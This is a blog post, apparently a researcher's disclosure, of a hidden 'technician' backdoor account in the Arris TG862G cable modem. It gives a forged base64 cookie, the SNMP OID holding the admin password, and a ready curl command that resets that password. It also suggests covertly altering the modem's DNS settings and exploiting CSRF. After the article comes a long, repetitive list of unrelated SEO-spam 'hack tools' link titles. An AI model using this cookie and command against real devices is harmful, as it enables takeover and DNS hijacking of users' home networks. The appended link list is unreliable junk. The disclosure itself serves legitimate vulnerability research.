Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related links

1. Hack Tools For Mac
2. Hack And Tools
3. Hacker Tools Hardware
4. Hacker Tools Apk Download
5. New Hacker Tools
6. Pentest Tools Open Source
7. Hak5 Tools
8. Hacker Security Tools
9. Pentest Automation Tools
10. How To Hack
11. Hack Apps
12. Hackers Toolbox
13. Pentest Tools Url Fuzzer
14. Hacking Tools Github
15. Hack Tools 2019
16. Pentest Tools Windows
17. Hacking Tools For Beginners
18. Hacking Tools Pc
19. Hack Tools For Ubuntu
20. Top Pentest Tools
21. Hacking Tools Windows
22. Computer Hacker
23. Underground Hacker Sites
24. Hacking Tools For Windows Free Download
25. Game Hacking
26. Hacker Tools Free
27. Pentest Tools For Android
28. Hack Tools Pc
29. Bluetooth Hacking Tools Kali
30. Hack Tools
31. Best Pentesting Tools 2018
32. Hacking Tools Usb
33. World No 1 Hacker Software
34. Hacking App
35. Hacking Tools For Windows Free Download
36. Pentest Tools List
37. Pentest Tools For Android
38. Pentest Tools Find Subdomains
39. Pentest Tools Android
40. Pentest Tools Download
41. What Are Hacking Tools
42. Hacker Tools Free
43. Hacker Tools Apk
44. Pentest Tools Find Subdomains
45. Hacking Apps
46. Hack Apps
47. Hacking Tools 2020
48. Pentest Tools Free
49. Hacker Search Tools
50. Growth Hacker Tools
51. Pentest Tools Alternative
52. Hacking Tools Online
53. Pentest Tools Android
54. Best Hacking Tools 2019
55. Best Hacking Tools 2019
56. New Hacker Tools
57. Hack Tools Github
58. Hacking Tools Download
59. Pentest Tools Bluekeep
60. Hackrf Tools
61. Hack Tools For Games
62. Hacker Tools Hardware
63. Hack Tools For Games
64. Easy Hack Tools
65. Hacking App
66. Hacker Tools
67. Hacking Tools Name
68. Pentest Tools For Ubuntu
69. Pentest Tools Tcp Port Scanner
70. Hacker Tools Apk
71. Pentest Tools Website Vulnerability
72. Hacker Tools Apk Download
73. How To Install Pentest Tools In Ubuntu
74. Growth Hacker Tools
75. Hacking Tools Github
76. Hacker Search Tools
77. Hacker
78. Install Pentest Tools Ubuntu
79. Pentest Automation Tools
80. Hacker Tools Online
81. Hacker Tools For Ios
82. Hacker Tools Online
83. Hacking Tools Usb
84. Game Hacking
85. Hacker Tools
86. Pentest Tools For Android
87. Pentest Tools Tcp Port Scanner
88. Hacking Tools For Beginners
89. Blackhat Hacker Tools
90. Hackers Toolbox
91. Pentest Tools Find Subdomains
92. Hak5 Tools
93. New Hacker Tools
94. Hacker
95. Hack Tools For Games
96. Hack Tools
97. Hack Tools
98. Hacker Tools Free Download
99. Hacking Tools Download
100. Hacking Apps
101. Pentest Tools Open Source
102. Top Pentest Tools
103. Hack Tools
104. Hacker Tools For Ios
105. Pentest Tools Windows
106. World No 1 Hacker Software
107. Physical Pentest Tools
108. Pentest Tools Online
109. Hacking Apps
110. Pentest Tools Port Scanner
111. Hacker Tools For Windows
112. Hack Tools Pc
113. Hacker Tools Free Download
114. Hacking Tools Free Download
115. Beginner Hacker Tools
116. Hacks And Tools
117. Pentest Tools Website
118. Pentest Tools Kali Linux